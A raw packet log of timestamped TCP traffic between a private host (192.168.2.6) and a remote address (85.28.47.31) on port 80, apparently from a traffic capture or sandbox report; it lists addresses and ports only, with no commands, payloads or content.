                                                                                        Jul 24, 2024 07:14:20.565931082 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.565948009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.566536903 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566549063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566557884 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566567898 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566577911 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.566586018 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566592932 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.566600084 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566612005 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566620111 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.566628933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566636086 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.566644907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566656113 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.566662073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566669941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.566678047 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566695929 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566703081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.566710949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.566720963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.566740990 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.567491055 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567502022 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567511082 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567522049 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567532063 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567538977 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.567548990 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567559958 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.567565918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567574024 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.567579985 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567589045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567596912 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.567605019 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567615986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567626953 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.567634106 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567646027 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567651033 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.567657948 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.567665100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.567688942 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568417072 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568427086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568437099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568448067 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568458080 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568464994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568475962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568490028 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568496943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568504095 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568514109 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568522930 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568531036 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568540096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568548918 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568556070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568556070 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568566084 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.568572998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568572998 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568584919 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.568598986 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.569366932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569377899 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569386959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569397926 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569411039 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569417000 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.569425106 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569436073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569442987 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.569453001 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569459915 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.569468975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569477081 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.569483995 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569494009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569503069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.569510937 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569521904 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.569525957 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.569545031 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.569561005 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570322037 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570332050 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570343971 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570354939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570362091 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570369959 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570378065 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570385933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570394039 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570401907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570415020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570420027 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570429087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570436001 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570444107 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570455074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570458889 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570470095 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570478916 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570486069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570496082 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.570501089 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570507050 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.570527077 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.571330070 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571341038 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571351051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571361065 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571369886 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.571377039 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571388006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571393967 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.571402073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571412086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571419954 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.571429014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571435928 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.571444035 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571451902 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.571460009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571469069 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.571475983 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.571482897 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.571497917 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.571516037 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.572154999 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.572168112 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.572176933 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.572187901 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.572196960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.572205067 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.572213888 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.572223902 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.572235107 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.572241068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.572257042 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.572262049 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.572271109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.572278023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.572293043 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.572392941 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.655818939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.655847073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.655859947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.655870914 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.655883074 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.655894995 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.655915022 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.655930996 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.655944109 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.655962944 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.656127930 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656171083 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.656253099 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656265020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656275988 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656286955 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656301975 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656307936 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.656322002 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656327963 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.656337023 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656346083 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.656354904 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656374931 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.656394005 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.656801939 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656812906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656825066 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656836033 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656847954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656857014 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.656866074 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.656881094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.656909943 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657088995 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657099962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657226086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657238007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657249928 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657262087 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657272100 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657283068 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657291889 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657300949 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657310009 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657318115 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657326937 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657336950 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657345057 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657352924 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657361984 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657375097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657381058 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657388926 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657397032 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657404900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657413960 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.657426119 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.657449961 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.658147097 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658158064 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658168077 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658179045 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658188105 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658195019 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.658204079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658215046 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658222914 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.658231020 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658237934 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.658246994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658256054 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658265114 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.658273935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658282995 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.658289909 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658301115 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.658308029 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.658329964 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.659235001 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659246922 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659256935 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659270048 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659281015 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659291029 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659307003 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.659317017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659324884 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.659333944 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659342051 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.659351110 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659362078 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.659368992 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659380913 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659389019 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.659398079 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659406900 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.659421921 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659427881 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.659439087 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.659444094 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.659480095 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.660201073 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660212994 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660223007 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660235882 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660248041 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660255909 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.660264969 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660274029 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.660283089 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660290956 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.660300016 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660312891 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.660319090 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660331011 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660339117 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.660348892 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660358906 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660368919 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.660377979 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660408974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.660408974 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.660423040 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.660458088 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.661170006 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661180973 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661190987 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661201954 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661216021 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661222935 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.661231995 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661242962 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661251068 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.661259890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661268950 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.661278009 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661286116 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.661295891 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661307096 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661315918 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.661325932 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661335945 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.661344051 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.661358118 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.661381960 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.662045002 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662056923 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662067890 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662080050 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662091017 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662101984 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662111998 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662123919 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662132978 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.662142992 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662149906 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.662159920 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662168026 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.662177086 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662189007 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.662197113 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662211895 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662218094 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.662235022 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.662249088 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.662925005 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662935972 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662945986 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662957907 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662971973 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.662976980 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662987947 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.662998915 CEST4971180192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:20.663005114 CEST804971185.28.47.31192.168.2.6
                                                                                        Jul 24, 2024 07:14:20.663013935 CEST4971180192.168.2.685.28.47.31
